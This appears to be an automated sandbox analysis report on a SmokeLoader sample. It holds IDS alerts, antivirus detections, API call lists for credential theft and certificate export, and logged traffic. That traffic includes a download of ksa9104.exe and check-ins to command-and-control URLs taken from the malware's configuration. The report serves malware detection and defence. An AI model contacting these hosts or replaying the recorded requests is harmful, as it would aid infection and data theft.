ETPRO MALWARE Dridex Post Checkin Activity 3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T02:53:17.662722+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49768	23.145.40.162	443	TCP
2024-10-03T02:53:19.181475+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49769	23.145.40.162	443	TCP
2024-10-03T02:53:20.075572+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49770	23.145.40.162	443	TCP
2024-10-03T02:53:20.989913+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49771	23.145.40.162	443	TCP
2024-10-03T02:53:21.908752+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49772	23.145.40.162	443	TCP
2024-10-03T02:53:22.783712+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49773	23.145.40.162	443	TCP
2024-10-03T02:53:23.899735+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49774	23.145.40.162	443	TCP
2024-10-03T02:53:24.778948+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49775	23.145.40.162	443	TCP
2024-10-03T02:53:25.666516+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49776	23.145.40.162	443	TCP
2024-10-03T02:53:26.548436+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49777	23.145.40.162	443	TCP
2024-10-03T02:53:27.429508+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49778	23.145.40.162	443	TCP
2024-10-03T02:53:28.411820+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49779	23.145.40.162	443	TCP
2024-10-03T02:53:29.382194+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49780	23.145.40.162	443	TCP
2024-10-03T02:53:30.255048+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49781	23.145.40.162	443	TCP
2024-10-03T02:53:31.913190+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49782	23.145.40.162	443	TCP
2024-10-03T02:53:32.807619+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49783	23.145.40.162	443	TCP
2024-10-03T02:53:33.727819+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49784	23.145.40.162	443	TCP
2024-10-03T02:54:53.771450+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49791	23.145.40.162	443	TCP
2024-10-03T02:55:09.932594+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49793	23.145.40.162	443	TCP
2024-10-03T02:55:27.953196+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49795	23.145.40.162	443	TCP
2024-10-03T02:55:44.353405+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49797	23.145.40.162	443	TCP
2024-10-03T02:56:00.871816+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49799	23.145.40.162	443	TCP

ETPRO MALWARE SmokeLoader encrypted module (3)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T02:53:17.816351+0200	2829848	2	Potentially Bad Traffic	23.145.40.162	443	192.168.2.4	49768	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: v173TV3V11.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\C35.exe	Avira: detection malicious, Label: HEUR/AGEN.1312571
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Avira: detection malicious, Label: HEUR/AGEN.1312571
Source: C:\Users\user\AppData\Roaming\vejhhuh	Avira: detection malicious, Label: HEUR/AGEN.1312571

Found malware configuration

Source: 00000005.00000002.2024380318.0000000002070000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}

Multi AV Scanner detection for domain / URL

Source: calvinandhalls.com	Virustotal: Detection: 5%	Perma Link
Source: nwgrus.ru	Virustotal: Detection: 12%	Perma Link
Source: http://nwgrus.ru/tmp/index.php	Virustotal: Detection: 15%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\451E.exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Roaming\bsjhhuh	ReversingLabs: Detection: 28%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\451E.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\vejhhuh	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: v173TV3V11.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\451E.exe	Code function: 9_2_00007FF763AF36F0 CryptExportKey,CryptExportKey,	9_2_00007FF763AF36F0
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Code function: 9_2_00007FF763AF3220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,	9_2_00007FF763AF3220
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00803098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,	11_2_00803098
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00803717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,	11_2_00803717
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00803E04 RtlCompareMemory,CryptUnprotectData,	11_2_00803E04
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00801198 CryptBinaryToStringA,CryptBinaryToStringA,	11_2_00801198
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_008011E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,	11_2_008011E1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_0080123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,	11_2_0080123B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00801FCE CryptUnprotectData,RtlMoveMemory,	11_2_00801FCE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 16_2_034A2404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,	16_2_034A2404
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 16_2_034A245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,	16_2_034A245E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 16_2_034A263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,	16_2_034A263E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_00552799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,	19_2_00552799
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_005525A4 CryptBinaryToStringA,CryptBinaryToStringA,	19_2_005525A4

Source: v173TV3V11.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\v173TV3V11.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49778 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49779 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49799 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\451E.exe	Code function: 9_2_00007FF763AFFB4C GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,	9_2_00007FF763AFFB4C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00802B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,	11_2_00802B15
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00801D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,	11_2_00801D4A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00803ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,	11_2_00803ED9
Source: C:\Windows\explorer.exe	Code function: 14_2_00C830A8 FindFirstFileW,FindNextFileW,FindClose,	14_2_00C830A8

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49738 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49737 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49752 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49741 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49788 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49744 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49736 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49750 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49751 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49758 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49754 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49740 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49787 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49763 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49745 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49760 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49749 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49764 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49742 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49789 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49739 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49792 -> 201.212.52.197:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49765 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49759 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49755 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49757 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49766 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49746 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49790 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49786 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49794 -> 201.212.52.197:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49753 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49743 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49796 -> 201.212.52.197:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49767 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49756 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49798 -> 201.212.52.197:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49747 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49748 -> 190.219.117.240:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49768 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49768 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49772 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49770 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49772 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49770 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49778 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49781 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49797 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49778 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49781 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49775 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49784 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49769 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49776 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49774 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49779 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49784 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49785 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49799 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49776 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49791 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49774 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49777 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49799 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49777 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49782 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49791 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49782 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49771 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49779 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49780 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49797 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49780 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49793 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49793 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49775 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49771 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49795 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49783 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49795 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49783 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49769 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49773 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49773 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2019082 - Severity 1 - ET MALWARE Windows route Microsoft Windows DOS prompt command exit OUTBOUND : 192.168.2.4:49800 -> 23.145.40.113:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 190.219.117.240 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 201.212.52.197 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.164 443	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Network Connect: 23.145.40.162 443	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://nwgrus.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://tech-servers.in.net/tmp/index.php
Source: Malware configuration extractor	URLs: http://unicea.ws/tmp/index.php

Source: Joe Sandbox View	IP Address: 23.145.40.164 23.145.40.164
Source: Joe Sandbox View	IP Address: 23.145.40.162 23.145.40.162

Source: Joe Sandbox View	ASN Name: TelecomArgentinaSAAR TelecomArgentinaSAAR
Source: Joe Sandbox View	ASN Name: CableOndaPA CableOndaPA
Source: Joe Sandbox View	ASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
Source: Joe Sandbox View	ASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US

Source: Joe Sandbox View	JA3 fingerprint: 72a589da586844d7f0818ce684948eea
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic

Suricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 23.145.40.162:443 -> 192.168.2.4:49768

Source: global traffic	HTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://chraqvgclyunxk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 274Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://inghaccxrhcia.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://uwadsovjohptv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: calvinandhalls.com
